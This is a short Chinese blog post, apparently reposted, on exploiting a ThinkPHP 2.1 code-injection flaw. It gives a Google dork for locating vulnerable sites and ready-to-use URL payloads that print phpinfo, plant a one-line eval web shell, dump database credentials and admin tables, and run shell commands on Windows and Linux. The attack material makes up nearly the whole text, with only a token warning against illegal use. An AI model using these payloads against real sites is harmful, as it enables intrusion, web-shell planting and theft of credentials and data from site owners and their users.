zoukankan      html  css  js  c++  java
  • Thinkphp2.1漏洞利用

    thinkphp2.1版本

    Google语法:

    inurl:index.php intext:ThinkPHP 2.1 { Fast & Simple OOP PHP Framework }  禁止用在非法用途

    进行测试,输出phpinfo

    index.php/Index/index/name/$%7B@phpinfo%28%29%7D

    输出版本信息:

    index.php/module/action/param1/${@print(THINK_VERSION)}

    写入一句话

    index.php/module/action/param1/${@print(eval($_POST[c]))}

     

     一些其他执行语句:

    1.使用c方法,获取其他数据库 配置相关信息:c(db_name)、c(db_host)、c(db_user)、c(db_pwd)等 

    /index.php/module/action/param1/$%7b@print(c(db_name))%7d

    3.使用d方法或者m方法,查询其他数据库 ,最典型的使用方式var_dump(d(admin)->select()),能够查询出管理员信息,当然,表名需要猜一下,一般是admin,user等

    /index.php/module/action/param1/$%7b@print(var_dump(d(admin)->select()))%7d

    4.利用php在“·”(tab键上面的键,url编码后为%60)之间的内容可以当做命令执行的方式,不管是windows还是linux下,都可以执行cmd或者是shell命令。

    index.php/module/action/param1/$%7b@print(%60dirls%60)%7d  ---------- 在windows下
    
    index.php/module/action/param1/$%7b@print(%60ls%60)%7d -------------在linux下
  • 相关阅读:
    vue 添加对象的新属性的方法
    vue 简单的c3属性写法
    大数据分析技术生态圈一览
    网络
    Axis2 WebService客户端Axis2调用
    前端资源
    不错的数据库
    dubbo
    大数据相关
    This is very likely to create a memory leak 异常
  • 原文地址:https://www.cnblogs.com/someone9/p/10186179.html
Copyright © 2011-2022 走看看